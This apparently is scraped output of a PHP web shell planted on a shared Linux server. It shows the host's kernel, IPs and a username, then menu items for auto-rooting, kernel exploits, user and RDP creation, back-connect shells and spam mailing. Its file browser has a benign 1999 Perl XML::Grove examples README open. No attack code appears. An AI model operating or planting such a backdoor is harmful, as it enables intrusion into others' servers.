Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-grove-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README
947
B
-rw-r--r--
grove.pl
1.43
KB
-rw-r--r--
my-html.html
957
B
-rw-r--r--
my-html.pl
2.16
KB
-rw-r--r--
test-ids.pl
739
B
-rw-r--r--
test-path.pl
837
B
-rw-r--r--
test-sub.pl
660
B
-rw-r--r--
visitor.pl
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
$Id: README,v 1.3 1999/02/05 17:54:43 kmacleod Exp $ Copyright (C) 1998 Ken MacLeod See the file COPYING for distribution terms. Grove Examples The following examples are listed in concept order, starting with the first will lead into concepts in the later examples. All examples use XML::Parser. grove.pl Uses the simplest form of XML objects to recursively dump the object tree, similar to the `debug' style of XML::Parser. visitor.pl Uses a visitor class and callbacks to dump the tree. This is similar to the `sub' style of XML::Parser except that it uses generic `visit_element' callbacks instead of by-tag-name callbacks (see my-html.pl for that). my-html.pl, my-html.html Uses a visitor class and by-tag-name callbacks to add new tags to HTML-like documents. This example in particular shows one way to embed Perl code into HTML documents.
Close